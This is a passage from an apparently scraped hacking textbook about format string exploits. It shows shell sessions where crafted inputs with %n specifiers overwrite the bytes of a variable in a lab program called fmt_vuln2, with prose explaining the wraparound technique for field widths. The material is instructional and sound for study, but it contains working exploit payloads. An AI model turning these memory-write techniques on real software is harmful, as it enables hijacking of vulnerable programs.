Graphics Programs Reference
In-Depth Information
4b4e554a
[*] test_val @ 0x080497f4 = 33991629 0x0206abcd
[*] next_val @ 0x080497f8 = 286326784 0x11110000
reader@hacking:~/booksrc $
With each write, bytes of the next_val variable, adjacent to test_val , are
being overwritten. The wraparound technique seems to be working fine, but
a slight problem manifests itself as the final byte is attempted.
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x08 - 0x06"
$1 = 2
reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\
x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n%91x%n%2x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n%91x%n%2x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3a0b7fe75fc
0
4b4e554a
4b4e554a4b4e554a
[*] test_val @ 0x080497f4 = 235318221 0x0e06abcd
[*] next_val @ 0x080497f8 = 285212674 0x11000002
reader@hacking:~/booksrc $
What happened here? The difference between 0x06 and 0x08 is only two,
but eight bytes are output, resulting in the byte 0x0e being written by the %n
format parameter, instead. This is because the field width option for the
%x format parameter is only a minimum field width, and eight bytes of data
were output. This problem can be alleviated by simply wrapping around
again; however, it's good to know the limitations of the field width option.
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x108 - 0x06"
$1 = 258
reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\
x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n%91x%n%258x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n%91x%n%258x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3a0b7fe75fc
0
4b4e554a
4b4e554a
4b4e554a
[*] test_val @ 0x080497f4 = 134654925 0x0806abcd
[*] next_val @ 0x080497f8 = 285212675 0x11000003
reader@hacking:~/booksrc $
Just like before, the appropriate addresses and junk data are put in the
beginning of the format string, and the least significant byte is controlled for
four write operations to overwrite all four bytes of the variable test_val . Any
value subtractions to the least significant byte can be accomplished by wrap-
ping the byte around. Also, any additions less than eight may need to be
wrapped around in a similar fashion.
Search WWH ::




Custom Search